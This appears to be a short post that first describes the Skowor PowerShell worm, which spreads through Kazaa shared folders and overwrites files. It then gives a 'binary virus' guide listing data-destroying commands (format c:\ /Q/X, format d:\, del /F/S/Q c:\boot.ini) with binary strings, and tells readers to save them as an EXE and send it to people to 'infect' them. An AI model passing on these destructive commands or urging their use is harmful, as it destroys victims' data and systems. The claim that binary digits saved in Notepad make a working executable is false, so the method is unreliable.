Powershell Worm SKOWOR


Name-Worm.MSH.Skowor.A
Type-Worm
Author-sk0r/Czybik
Written in-PowerShell



Description-
I was looking for PowerShell based malware and eventually found the POC Skowor worm. The only worm written in this language.
It attempts to propagate via the Kazaa P2P network by putting a copy of itself in the shared folders. As far as I see there is no typical malicious payload except it overwrites files with a specific file extension.

Good to know it exists and to see how it works.
Download
Source

create 5 binary virus

1.   A simple binary codes that can format the system drive ,secondary drives…
Copy The Following In Notepad Exactly as it

01001011000111110010010101010101010000011111100000

2.    Some other interesting formatting codes….
format c:\ /Q/X — this will format your drive c:\
01100110011011110111001001101101011000010111010000 100000011000110011101001011100 0010000000101111010100010010111101011000

3.    format d:\ /Q/X — this will format your drive d:\
01100110011011110111001001101101011000010111010000 100000011001000011101001011100 0010000000101111010100010010111101011000

4.    format a:\ /Q/X — this will format your drive a:\
01100110011011110111001001101101011000010111010000 100000011000010011101001011100 0010000000101111010100010010111101011000

5.   del /F/S/Q c:\boot.ini — this will cause your computer not to boot.
01100100011001010110110000100000001011110100011000 101111010100110010111101010001 00100000011000110011101001011100011000100110111101 101111011101000010111001101001 0110111001101001



Save As An EXE Any Name Will Do
Send the EXE to People And Infect